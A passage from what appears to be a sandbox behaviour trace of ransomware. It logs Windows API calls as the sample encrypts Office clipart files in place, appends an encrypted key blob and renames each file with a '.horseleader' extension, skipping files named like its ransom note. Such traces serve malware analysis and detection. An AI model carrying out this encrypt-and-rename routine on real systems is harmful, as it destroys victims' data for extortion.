lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4c5e, lpOverlapped=0x0) returned 1 [0253.909] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb3a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.909] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4c5e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4c5e, lpOverlapped=0x0) returned 1 [0253.909] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.910] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.910] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.910] CloseHandle (hObject=0x158) returned 1 [0253.910] GetProcessHeap () returned 0x780000 [0253.910] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.910] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.horseleader") returned 79 [0253.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf.horseleader")) returned 1 [0253.911] GetProcessHeap () returned 0x780000 [0253.911] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.911] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8c4300, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5d8c4300, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0x318, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00372_.WMF", cAlternateFileName="")) returned 1 [0253.911] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="Windows") returned -1 [0253.911] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 67 [0253.911] StrStrIW (lpFirst="DD00372_.WMF", lpSrch=".horseleader") returned 0x0 [0253.911] lstrcmpW (lpString1="DD00372_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.911] lstrcmpW (lpString1="DD00372_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.911] lstrlenW (lpString=".testttjffg") returned 11 [0253.911] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.911] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.911] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.912] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 67 [0253.913] StrStrW (lpFirst="DD00372_.WMF", lpSrch=".txt") returned 0x0 [0253.913] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=792) returned 1 [0253.913] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x318, lpOverlapped=0x0) returned 1 [0253.914] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffce8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.914] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x318, lpOverlapped=0x0) returned 1 [0253.914] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.915] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.915] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.915] CloseHandle (hObject=0x158) returned 1 [0253.915] GetProcessHeap () returned 0x780000 [0253.915] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.915] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.horseleader") returned 79 [0253.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf.horseleader")) returned 1 [0253.916] GetProcessHeap () returned 0x780000 [0253.916] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.916] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x44b0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00405_.WMF", cAlternateFileName="")) returned 1 [0253.916] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="Windows") returned -1 [0253.916] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 67 [0253.916] StrStrIW (lpFirst="DD00405_.WMF", lpSrch=".horseleader") returned 0x0 [0253.916] lstrcmpW (lpString1="DD00405_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.916] lstrcmpW (lpString1="DD00405_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.916] lstrlenW (lpString=".testttjffg") returned 11 [0253.916] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.916] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.916] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 67 [0253.917] StrStrW (lpFirst="DD00405_.WMF", lpSrch=".txt") returned 0x0 [0253.917] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=17584) returned 1 [0253.917] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x44b0, lpOverlapped=0x0) returned 1 [0253.919] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffbb50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.919] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x44b0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x44b0, lpOverlapped=0x0) returned 1 [0253.919] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.919] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.919] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.919] CloseHandle (hObject=0x158) returned 1 [0253.919] GetProcessHeap () returned 0x780000 [0253.919] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.919] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.horseleader") returned 79 [0253.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf.horseleader")) returned 1 [0253.920] GetProcessHeap () returned 0x780000 [0253.920] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.920] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e94, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00407_.WMF", cAlternateFileName="")) returned 1 [0253.920] lstrcmpiW (lpString1="DD00407_.WMF", lpString2="Windows") returned -1 [0253.920] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 67 [0253.920] StrStrIW (lpFirst="DD00407_.WMF", lpSrch=".horseleader") returned 0x0 [0253.921] lstrcmpW (lpString1="DD00407_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.921] lstrcmpW (lpString1="DD00407_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.921] lstrlenW (lpString=".testttjffg") returned 11 [0253.921] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.921] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.921] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.921] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 67 [0253.921] StrStrW (lpFirst="DD00407_.WMF", lpSrch=".txt") returned 0x0 [0253.921] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7828) returned 1 [0253.921] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1e94, lpOverlapped=0x0) returned 1 [0253.923] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe16c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.923] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1e94, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1e94, lpOverlapped=0x0) returned 1 [0253.924] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.924] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.924] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.924] CloseHandle (hObject=0x158) returned 1 [0253.924] GetProcessHeap () returned 0x780000 [0253.924] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.924] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.horseleader") returned 79 [0253.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf.horseleader")) returned 1 [0253.925] GetProcessHeap () returned 0x780000 [0253.925] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.925] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa7f0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00413_.WMF", cAlternateFileName="")) returned 1 [0253.925] lstrcmpiW (lpString1="DD00413_.WMF", lpString2="Windows") returned -1 [0253.925] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 67 [0253.925] StrStrIW (lpFirst="DD00413_.WMF", lpSrch=".horseleader") returned 0x0 [0253.925] lstrcmpW (lpString1="DD00413_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.925] lstrcmpW (lpString1="DD00413_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.925] lstrlenW (lpString=".testttjffg") returned 11 [0253.925] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.925] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.925] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.927] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 67 [0253.927] StrStrW (lpFirst="DD00413_.WMF", lpSrch=".txt") returned 0x0 [0253.927] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=42992) returned 1 [0253.927] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.929] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.929] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.930] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.930] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.930] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7f0, lpOverlapped=0x0) returned 1 [0253.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff810, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.930] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7f0, lpOverlapped=0x0) returned 1 [0253.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.931] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.931] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.931] CloseHandle (hObject=0x158) returned 1 [0253.931] GetProcessHeap () returned 0x780000 [0253.931] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.931] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.horseleader") returned 79 [0253.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf.horseleader")) returned 1 [0253.932] GetProcessHeap () returned 0x780000 [0253.932] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.932] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa79c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00414_.WMF", cAlternateFileName="")) returned 1 [0253.932] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="Windows") returned -1 [0253.932] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 67 [0253.932] StrStrIW (lpFirst="DD00414_.WMF", lpSrch=".horseleader") returned 0x0 [0253.932] lstrcmpW (lpString1="DD00414_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.932] lstrcmpW (lpString1="DD00414_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.932] lstrlenW (lpString=".testttjffg") returned 11 [0253.932] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.932] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.932] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.933] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 67 [0253.933] StrStrW (lpFirst="DD00414_.WMF", lpSrch=".txt") returned 0x0 [0253.933] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=42908) returned 1 [0253.933] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.936] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.936] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.936] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.936] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, 